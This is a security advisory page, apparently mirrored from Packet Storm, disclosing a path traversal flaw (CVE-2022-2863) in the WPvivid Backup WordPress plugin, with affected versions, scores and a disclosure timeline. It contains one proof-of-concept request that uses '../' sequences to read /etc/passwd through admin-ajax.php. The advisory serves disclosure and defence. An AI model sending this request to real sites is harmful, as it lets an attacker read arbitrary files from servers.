WordPress WPvivid Backup Path Traversal

🗓️ 04 Oct 2022 00:00:00Reported by Rodolfo Tavares, tempest.com.brType

packetstorm🔗 packetstormsecurity.com👁 307 Views

WordPress WPvivid Backup Path Traversal vulnerability fix confirmed with CVE-2022-286

Reporter	Title	Published	Views	Family All 13
0day.today	WordPress WPvivid Backup Path Traversal Vulnerability	5 Oct 202200:00	–	zdt
ATTACKERKB	CVE-2022-2863	16 Sep 202209:15	–	attackerkb
Circl	CVE-2022-2863	16 Sep 202212:38	–	circl
CNNVD	WordPress plugin Migration, Backup, Staging 路径遍历漏洞	16 Sep 202200:00	–	cnnvd
CVE	CVE-2022-2863	16 Sep 202200:00	–	cve
Cvelist	CVE-2022-2863 WPvivid Backup < 0.9.76 - Admin+ Arbitrary File Read	16 Sep 202200:00	–	cvelist
EUVD	EUVD-2022-35097	3 Oct 202520:07	–	euvd
Nuclei	WordPress WPvivid Backup <0.9.76 - Local File Inclusion	6 Jun 202603:01	–	nuclei
NVD	CVE-2022-2863	16 Sep 202209:15	–	nvd
OpenVAS	WordPress Migration, Backup, Staging - WPvivid Plugin < 0.9.76 Directory Traversal Vulnerability	19 Sep 202200:00	–	openvas

`=====[ Tempest Security Intelligence - ADV-15/2022  
]==========================  
  
Wordpress plugin - WPvivid Backup - Version < 0.9.76  
  
Author: Rodolfo Tavares  
  
Tempest Security Intelligence - Recife, Pernambuco - Brazil  
  
=====[ Table of Contents]==================================================  
* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References  
  
=====[ Vulnerability  
Information]=============================================  
* Class: Improper Limitation of a Pathname to a Restricted Directory  
('Path Traversal')  
('Path Traversal') [CWE-22]  
  
* CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
* CVSS Base Score 7.2  
  
=====[ Overview]========================================================  
* System affected : Wordpress plugin - WPvivid Backup  
* Software Version : Version < 0.9.76  
* Impacts : The plugin WPvivid Backup does not sanitise and validate a  
parameter before using it to read the content of a file, allowing high  
privilege users to read any file from the web server via a Traversal attack.  
  
=====[ Detailed  
description]=================================================  
* Steps to reproduce  
  
1 - Authenticated as privilege user, copy the request below, change the  
placeholder {{nonce}} with a valid nonce:  
```  
  
https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922  
```  
  
=====[ Timeline of  
disclosure]===============================================  
  
11/Aug/2022 - Responsible disclosure was initiated with the vendor.  
15/Aug/2022 - WPvivid Support confirmed the issue.  
16/Aug/2022 - WPvivid Support fix the issue.  
08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863.  
  
=====[ Thanks & Acknowledgements]========================================  
* Tempest Security Intelligence [5]  
  
=====[ References ]=====================================================  
  
[1][ [  
https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html  
]]  
[2][ [  
https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a  
[3][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
[4][ [  
https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]]  
]  
[5][ [Thanks FXO,ACPM,MFPP]]  
  
=====[ EOF ]===========================================================  
--  
  
`

04 Oct 2022 00:00Current

5.2Medium risk

Vulners AI Score5.2

CVSS 3.14.9

EPSS0.10885